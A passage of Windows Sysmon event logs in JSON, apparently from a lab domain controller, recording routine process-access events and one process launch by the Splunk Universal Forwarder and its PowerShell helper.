05:47:56.634","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2757,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.634","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2758,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.634","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2759,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.634","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2760,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.634","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2761,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.634\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-020C-5F25-0000-00104AE10400}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.634","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-020C-5F25-0000-00104AE10400}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2762,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:56.759\r\nSourceProcessGUID: {A837DB8D-020C-5F25-0000-00104AE10400}\r\nSourceProcessId: 4544\r\nSourceThreadId: 4536\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:56.759","SourceProcessGUID":"{A837DB8D-020C-5F25-0000-00104AE10400}","SourceProcessId":"4544","SourceThreadId":"4536","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2763,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.511\r\nProcessGuid: {A837DB8D-020D-5F25-0000-001069E30400}\r\nProcessId: 4548\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.511","ProcessGuid":"{A837DB8D-020D-5F25-0000-001069E30400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2764,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:57.510\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-020D-5F25-0000-001069E30400}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:57.510","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-020D-5F25-0000-001069E30400}","TargetProcessId":"4548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
